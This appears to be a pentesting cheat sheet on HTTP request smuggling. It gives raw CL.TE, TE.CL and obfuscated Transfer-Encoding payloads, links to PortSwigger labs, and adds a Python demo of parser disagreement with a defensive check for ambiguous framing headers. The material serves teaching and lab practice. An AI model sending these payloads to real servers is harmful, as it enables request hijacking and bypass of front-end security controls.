
# Request Smuggling

## Summary

* [Tools](#tools)
* [CL.TE vulnerabilities](#clte-vulnerabilities)
* [TE.CL vulnerabilities](#tecl-vulnerabilities)
* [TE.TE behavior: obfuscating the TE header](#tete-behavior-obfuscating-the-te-header)
* [References](#references)

## Tools

* [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646)
* [Smuggler](https://github.com/defparam/smuggler)

## CL.TE vulnerabilities

> The front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.

```http
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED
```

Example:

```http
POST / HTTP/1.1
Host: domain.example.com
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G
```

Challenge: <https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te>

## TE.CL vulnerabilities

> The front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header.

```http
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0
```

Example:

```http
POST / HTTP/1.1
Host: domain.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86
Transfer-Encoding: chunked
Content-Length: 4
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

```

:warning: To send this request using Burp Repeater, you first need to open the Repeater menu and ensure that the "Update Content-Length" option is unchecked. You also need to include the trailing sequence `\r\n\r\n` after the final `0`.

Challenge: <https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl>
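The CL.TE and TE.CL sections above both come down to two parsers disagreeing on where one request ends and the next begins. The following is an added example, not code from PayloadsAllTheThings or PortSwigger: it feeds the same raw request to a Content-Length-first parser and a chunked-first parser and returns what each one treats as the body and what it leaves on the connection (the leftover is the "smuggled" request). It also includes the check a front end should apply per RFC 7230 section 3.3.3, which says Transfer-Encoding overrides Content-Length, that a message carrying both ought to be treated as an error, and that a proxy must remove Content-Length before forwarding. The sample requests are constructed from the two minimal payloads on this page.

```python
from typing import Dict, Tuple

def split_request(raw: bytes) -> Tuple[Dict[bytes, bytes], bytes]:
    """Split a raw HTTP/1.1 request into a lowercased header map and the body bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers: Dict[bytes, bytes] = {}
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def read_content_length(headers: Dict[bytes, bytes], body: bytes) -> Tuple[bytes, bytes]:
    """CL-first server: body is exactly Content-Length bytes; anything after is the next request."""
    n = int(headers[b"content-length"])
    return body[:n], body[n:]

def read_chunked(body: bytes) -> Tuple[bytes, bytes]:
    """TE-first server: decode chunks up to the 0-size chunk; anything after is the next request."""
    data, pos = b"", 0
    while True:
        nl = body.index(b"\r\n", pos)
        size = int(body[pos:nl].split(b";")[0], 16)   # chunk size in hex, extensions ignored
        pos = nl + 2
        if size == 0:
            return data, body[body.index(b"\r\n", pos) + 2:]   # skip the empty trailer line
        data += body[pos:pos + size]
        pos += size + 2                                # chunk data plus its CRLF

def desync_split(raw: bytes) -> Dict[str, Tuple[bytes, bytes]]:
    """Return (body, leftover) as seen by a CL-first ('cl') and a TE-first ('te') server."""
    headers, body = split_request(raw)
    return {"cl": read_content_length(headers, body), "te": read_chunked(body)}

def framing_is_ambiguous(raw: bytes) -> bool:
    """Front-end check: a request with both framing headers must be rejected or normalized."""
    headers, _ = split_request(raw)
    return b"content-length" in headers and b"transfer-encoding" in headers

# Constructed samples: the minimal CL.TE and TE.CL payloads shown on this page.
CL_TE = (b"POST / HTTP/1.1\r\nHost: vulnerable-website.com\r\n"
         b"Content-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n"
         b"0\r\n\r\nSMUGGLED")
TE_CL = (b"POST / HTTP/1.1\r\nHost: vulnerable-website.com\r\n"
         b"Content-Length: 3\r\nTransfer-Encoding: chunked\r\n\r\n"
         b"8\r\nSMUGGLED\r\n0\r\n\r\n")

if __name__ == "__main__":
    for name, raw in (("CL.TE", CL_TE), ("TE.CL", TE_CL)):
        print(name, desync_split(raw), "ambiguous:", framing_is_ambiguous(raw))
```

For CL.TE the CL-first front end forwards all 13 body bytes while the TE-first back end stops after the `0` chunk and holds `SMUGGLED` as the start of the next request; for TE.CL the roles reverse and the CL-first back end sees only `8\r\n` as the body.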

## TE.TE behavior: obfuscating the TE header

> The front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.

```http
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding
: chunked
```

Challenge: <https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header>

## References

* [PortSwigger - Request Smuggling Tutorial](https://portswigger.net/web-security/request-smuggling) and [PortSwigger - Request Smuggling Reborn](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn)
* [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - 2020, October 16](https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0)
